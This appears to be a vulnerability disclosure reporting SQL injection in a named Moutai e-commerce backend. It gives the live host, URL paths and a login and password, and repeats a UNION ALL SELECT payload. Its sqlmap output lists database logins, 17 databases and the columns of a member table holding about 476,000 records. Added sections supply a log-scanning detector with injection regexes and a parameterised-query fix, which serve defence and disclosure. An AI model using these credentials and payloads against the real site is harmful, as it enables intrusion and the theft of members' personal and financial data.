Multiple SQL injections in the Moutai e-commerce backend, bundled (DBA privileges / 17 databases / 470,000 members)
Note:
http://www.emaotai.cn:90/zyd/
Account: wanglei
Password: 123456
GET-submitted SQL injection points:
http://www.emaotai.cn:90/zyd/Sales/XsdEdit.aspx?Pjbh=111000100020&ReturnPage=Xsmxz.aspx&op=2
http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650
http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18
POST-submitted injection points (you can find them by entering a single quote in the search box):
There are many more similar problems; check them yourselves.
http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650
Example, run against this point:
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)--
---
[09:33:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:33:34] [INFO] fetching database users
[09:33:35] [INFO] the SQL query used returns 12 entries
database management system users [11]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] actuser
[*] bmDev
[*] dev
[*] distributor_admin
[*] hishop_pj
[*] moutaiwssc
[*] mysys
[*] sa
[*] taxreader
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)--
---
[09:31:54] [INFO] testing Microsoft SQL Server
[09:31:54] [INFO] confirming Microsoft SQL Server
[09:31:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:31:55] [INFO] fetching database names
[09:31:55] [INFO] the SQL query used returns 18 entries
available databases [17]:
[*] distribution
[*] DrpEco
[*] drpecosdl
[*] DrpEcoTest
[*] eAct
[*] eActTest
[*] emaotai_act_test
[*] emaotai_logs
[*] hishop
[*] master
[*] model
[*] moutai
[*] moutaitest
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: hishop (sqlmap listing of every table with its entry count)
aspnet_Members is the member table, with 476302 rows. Check the first two rows:
Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)--
---
[09:55:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:55:19] [INFO] fetching columns for table 'aspnet_Members' in database 'hishop'
[09:55:19] [INFO] the SQL query used returns 31 entries
[09:55:19] [INFO] fetching entries for table 'aspnet_Members' in database 'hishop'
[09:55:19] [INFO] fetching number of distinct values for column 'qq'
[09:55:19] [INFO] fetching number of distinct values for column 'msn'
[09:55:19] [INFO] fetching number of distinct values for column 'openid'
[09:55:19] [INFO] fetching number of distinct values for column 'points'
[09:55:19] [INFO] fetching number of distinct values for column 'typeid'
[09:55:19] [INFO] fetching number of distinct values for column 'address'
[09:55:19] [INFO] fetching number of distinct values for column 'balance'
[09:55:19] [INFO] fetching number of distinct values for column 'gradeid'
[09:55:19] [INFO] fetching number of distinct values for column 'zipcode'
[09:55:19] [INFO] fetching number of distinct values for column 'countbuy'
[09:55:19] [INFO] fetching number of distinct values for column 'realname'
[09:55:19] [INFO] fetching number of distinct values for column 'regionid'
[09:55:19] [INFO] fetching number of distinct values for column 'telphone'
[09:55:19] [INFO] fetching number of distinct values for column 'wangwang'
[09:55:19] [INFO] fetching number of distinct values for column 'Cellphone'
[09:55:19] [INFO] fetching number of distinct values for column 'sessionid'
[09:55:19] [INFO] fetching number of distinct values for column 'userid_drp'
[09:55:19] [INFO] fetching number of distinct values for column 'Expenditure'
[09:55:19] [INFO] fetching number of distinct values for column 'ordernumber'
[09:55:19] [INFO] fetching number of distinct values for column 'topregionid'
[09:55:19] [INFO] fetching number of distinct values for column 'vipcarddate'
[09:55:19] [INFO] fetching number of distinct values for column 'isopenbalance'
[09:55:19] [INFO] fetching number of distinct values for column 'vipcardnumber'
[09:55:19] [INFO] fetching number of distinct values for column 'referraluserid'
[09:55:19] [INFO] fetching number of distinct values for column 'requestbalance'
[09:55:19] [INFO] fetching number of distinct values for column 'sessionendtime'
[09:55:19] [INFO] fetching number of distinct values for column 'recordstatus_drp'
[09:55:19] [INFO] fetching number of distinct values for column 'tradepasswordsalt'
[09:55:19] [INFO] fetching number of distinct values for column 'tradepasswordformat'
[09:55:19] [WARNING] no proper character column provided (with unique values). it won't be possible to retrieve all rows
[09:55:20] [INFO] analyzing table dump for possible password hashes
Database: hishop
Table: aspnet_Members
[2 entries]
(the two dumped member rows, containing real names, mobile numbers, QQ numbers, balances and trade-password salts, are omitted here)
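A log check for the request shape used above (a quote-break in the numeric spbh parameter, UNION ALL SELECT, and a CHAR()+CHAR() marker chain), as an added example that is not part of the report. The log lines are constructed, not the site's, and their field layout (stem, query, status, user-agent) is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed lines modelled on the Xsmxz.aspx request in the report; field order
# stem / query / status / user-agent is an assumption, not a real IIS log format.
SAMPLE_LOG = """\
/zyd/Sales/Xsmxz.aspx ReturnPage=Xsflz.aspx&spbh=650 200 Mozilla/5.0
/zyd/Sales/Xsmxz.aspx ReturnPage=Xsflz.aspx&spbh=-4455%27%20UNION%20ALL%20SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28118%29-- 200 Mozilla/5.0
/zyd/Store/Kctz.aspx ReturnPage=Tzflz.aspx&spbh=18 200 Mozilla/5.0
/zyd/Sales/Xsmxz.aspx ReturnPage=Xsflz.aspx&spbh=650%27 500 sqlmap/1.0
"""

# A quote closing the literal, then UNION [ALL] SELECT (case-insensitive).
UNION_RE = re.compile(r"'\s*union\s+(all\s+)?select\b", re.I)
# Two or more CHAR(n)+ pieces: how sqlmap builds its marker string on SQL Server.
CHAR_CHAIN_RE = re.compile(r"(char\(\d{1,3}\)\s*\+\s*){2,}", re.I)
# Parameters the report shows carrying integer ids.
NUMERIC_PARAMS = ("spbh", "pjbh")

def scan_query(query):
    """Return the reasons a decoded query string looks like the reported injection."""
    decoded = unquote_plus(query)
    reasons = []
    if UNION_RE.search(decoded):
        reasons.append("quote-break followed by UNION SELECT")
    if CHAR_CHAIN_RE.search(decoded):
        reasons.append("CHAR() concatenation chain")
    for pair in decoded.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() in NUMERIC_PARAMS and not value.isdigit():
            reasons.append(f"non-numeric value in id parameter {name}: {value[:20]!r}")
    return reasons

def scan_log(text):
    """Return (stem, status, reasons) for every line worth an alert."""
    hits = []
    for line in text.splitlines():
        stem, query, status, agent = line.split(" ", 3)
        reasons = scan_query(query)
        if agent.lower().startswith("sqlmap"):
            reasons.append("sqlmap user-agent")
        if reasons:
            hits.append((stem, int(status), reasons))
    return hits
```

The single-quote probe on the last line is the "enter a single quote in the search box" test from the report; a 500 on an id parameter is the cheapest signal to alert on even before the UNION payload arrives.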
Fix:
You are more professional than me.
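The defect behind every point in the report is the same: the id parameter is pasted into the SQL text. Added example (not the site's code, which is ASP.NET on SQL Server 2008): a Python/sqlite3 stand-in for the spbh lookup, vulnerable form beside the validated, parameterised form. The table, product names and the sqlite char()/|| spelling of the marker are assumptions.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the product table behind Xsmxz.aspx."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (spbh INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(650, "product 650"), (18, "product 18")])
    return conn

def lookup_vulnerable(conn, spbh):
    """The defect in the report: the request parameter becomes part of the SQL text."""
    sql = f"SELECT name FROM products WHERE spbh = '{spbh}'"
    return [row[0] for row in conn.execute(sql)]

def lookup_fixed(conn, spbh):
    """Validate the id as an integer, then bind it; the query text never changes."""
    if not isinstance(spbh, str) or not spbh.isdigit():
        raise ValueError("spbh must be a non-negative integer id")
    rows = conn.execute("SELECT name FROM products WHERE spbh = ?", (int(spbh),))
    return [row[0] for row in rows]

def fixed_rejects(conn, spbh):
    """True when the hardened lookup refuses the value before any SQL runs."""
    try:
        lookup_fixed(conn, spbh)
    except ValueError:
        return True
    return False

# Same shape as the report's payload: an id that matches nothing, so the real
# query returns no rows, then a UNION that appends a marker built from char()
# calls (sqlite spelling; SQL Server uses CHAR()+CHAR()). The trailing comment
# swallows the closing quote the application adds.
MARKER_PAYLOAD = ("-4455' UNION ALL SELECT char(113)||char(122)||char(118)"
                  "||char(120)||char(113) -- ")
```

The title's DBA privileges are a separate fix: the site should connect as a login limited to the hishop database, so that a future injection cannot enumerate every login and database as the sqlmap output above did.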